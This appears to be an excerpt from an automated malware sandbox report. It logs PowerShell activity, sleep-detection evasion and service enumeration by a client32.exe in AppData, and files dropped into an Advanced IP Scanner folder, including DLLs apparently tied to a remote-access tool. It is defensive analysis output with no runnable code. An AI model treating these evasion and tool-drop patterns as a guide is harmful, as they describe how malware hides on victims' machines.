Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11069C00	6_2_11069C00
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11069C99	6_2_11069C99
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C691F0	6_2_68C691F0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C74F30	6_2_68C74F30
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11069C00	8_2_11069C00
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11069C99	8_2_11069C99

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,_memset,_memset,FreeLibrary,CloseServiceHandle,		6_2_11127110
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,_memset,_memset,FreeLibrary,CloseServiceHandle,		8_2_11127110

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6654	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3057	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Window / User API: threadDelayed 433	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Window / User API: threadDelayed 8024	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-0N1O0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-7UFVB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-RN6EP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-8T81V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-LNMM3.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-RR8GH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-6IECG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-NS45S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-5NJTL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-43K8A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-70A69.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-A5E7F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-4OBJP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-3CKII.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-EU182.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-BOBPK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FUMI5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-EFF8I.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-075U6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-VMB1B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-BLUTK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-BQO9P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-VKO3B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-LNG1F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-INF7O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-UFHDJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-N0NN5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-UNKVD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-P5532.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-806EH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-7BDCE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-GFAIP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-RIP10.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-133UG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-MH6KB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-HN5GF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)	Jump to dropped file
